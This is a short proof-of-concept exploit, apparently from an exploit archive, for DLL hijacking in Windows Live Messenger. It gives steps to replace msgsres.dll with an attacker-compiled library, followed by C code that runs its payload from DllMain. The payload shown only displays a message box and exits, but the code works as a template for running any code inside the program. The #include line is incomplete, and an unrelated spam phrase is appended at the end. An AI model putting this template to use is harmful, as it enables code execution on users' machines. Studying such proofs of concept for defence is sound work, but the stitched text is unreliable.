/* Description: A vulnerability exists in windows that allows other applications dynamic link libraries to execute malicious code without the users consent, in the privelage context of the targeted application. Title: Windows Live! Messenger (Build 1.0.8117.416) dll (msgsres.dll) Hijacking exploit Author: xsploited security URL: http://www.x-sploited.com/ Email: xsploitedsecurity[at]gmail.com Instructions: 1. Compile dll 2. Replace msgsres.dll in Windows Live! Messenger program directory with your newly compiled dll 3. Launch Messenger 4. Messagebox shown, Msn closes */ #include int pwnme() { MessageBox(0, "Code Execution", "Dll Message", MB_OK); exit(0); return 0; } BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved) { pwnme(); return 0; }

亚洲欧美在线